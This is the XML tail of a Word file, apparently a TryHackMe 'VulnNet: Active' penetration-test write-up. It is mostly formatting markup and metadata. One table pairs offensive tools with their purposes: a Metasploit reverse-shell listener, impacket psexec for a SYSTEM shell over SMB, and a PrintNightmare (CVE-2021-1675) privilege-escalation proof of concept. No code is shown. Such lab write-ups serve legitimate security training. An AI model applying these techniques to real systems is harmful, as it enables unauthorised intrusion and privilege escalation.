        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="0479DC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D01B" w14:textId="77777777" w:rsidR="00C8729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Metasploit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6FE1" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reverse shell listener (multi/handler)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="2CB65D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A0A1" w14:textId="77777777" w:rsidR="00C87297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impacket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psexec.py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183A" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SYSTEM shell via SMB service execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C87297" w14:paraId="4C120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A7E3" w14:textId="77777777" w:rsidR="00C8729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CVE-2021-1675 PoC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991" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PrintNightmare</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B3AB363" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4600D620" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00C87297">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29235887" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="2E75B6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Written by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tusharmumbre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">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TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ·</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  March </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2026  ·</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  102-Day Streak 🔥</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C87297">
      <w:head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C60AF" w14:textId="77777777" w:rsidR="00520DD7" w:rsidRDefault="00520DD7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1C8546D2" w14:textId="77777777" w:rsidR="00520DD7" w:rsidRDefault="00520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4ACD" w14:textId="77777777" w:rsidR="00520DD7" w:rsidRDefault="00520DD7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1BC2DBDD" w14:textId="77777777" w:rsidR="00520DD7" w:rsidRDefault="00520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3B4A" w14:textId="77777777" w:rsidR="00C87297" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>TryHackMe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VulnNet</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">: </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Active  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  Penetration Test Writeup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7E8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="166A5044"/>
    <w:lvl w:ilvl="0" w:tplc="ADA4DECE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="245A1218">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8DBCD734">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7A0E014A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C43E2BD2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="72B05134">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C5166C54">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="656A096C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D4E852CC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="32285C84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6B439B8"/>
    <w:lvl w:ilvl="0" w:tplc="A3E077EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="DC263ACA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D68A2594">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F1B43B90">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8E3ACB2A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="897AB518">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C6B6B88E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A2FACF58">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="093A51A0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7E4D329F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D6E536C"/>
    <w:lvl w:ilvl="0" w:tplc="BA8AC26C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="64A22D9E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="73D4EF34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1EC6D842">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="105E3960">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6A48A5F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A9AEEF56">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7E424948">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CEB0EF10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1049108899">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1599558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97"/>
    <w:rsid w:val="00520DD7"/>
    <w:rsid w:val="006E3C38"/>
    <w:rsid w:val="00C87297"/>
    <w:rsid w:val="00FF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5524"/>
  <w15:docId w15:val="{1DCA93F1-A751-4A3C-A5AB-406F2809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1259</Words>
  <Characters>7178</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>59</Lines>
  <Paragraphs>16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siddhesh Mumbre</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-30T09:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-30T09:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>